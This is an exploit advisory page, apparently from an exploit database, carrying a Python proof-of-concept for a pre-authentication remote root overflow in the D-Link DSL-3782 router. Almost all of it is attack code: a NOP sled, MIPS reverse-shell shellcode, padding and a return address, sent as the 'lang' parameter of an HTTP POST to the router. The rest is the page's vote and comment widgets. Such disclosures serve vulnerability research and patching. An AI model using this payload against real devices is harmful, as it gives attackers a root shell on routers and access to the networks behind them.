D-Link DSL-3782 Pre-Authentication Remote Root

2021.11.27
Credit: Cody Sixteen
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python2 # preauth rece for dlink dsl-3782 # found: 06.11.2021 # pwned: 18.112021 @ 19:26 # import sys import urllib2 # requests import urllib import struct target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp' nopsled = "" # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes) for i in range(74): nopsled += "\x41\x41\x41\x41" # 26\x40\x08\x01" #print("nopsled len: %s" % len(nopsled)) #print(len(nopsled)) # shellcode; revshell: 272-232=?: buf = b"" buf += b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01" buf += b"\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01" buf += b"\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70" buf += b"\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68\x04" buf += b"\x24\x0e\x27\x0f\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf" buf += b"\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10" buf += b"\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff" buf += b"\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25" buf += b"\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02" buf += b"\x10\x20\x25\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02" buf += b"\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24\x11\xff" buf += b"\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21" buf += b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22" buf += b"\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f" buf += b"\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e" buf += b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4" buf += b"\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27" buf += b"\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c" shellcode = buf #shellcode = ( "D" * 276 ) ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242) junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled)) ############### #payload = junk + shellcode + ret payload = nopsled + shellcode + junk + ret #print(len(payload)) print(payload) data = urllib.urlencode({'lang' : payload }) sendme = urllib2.Request(target, data ) # url=target, data=post_me) #print(sendme) #print "DONE"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top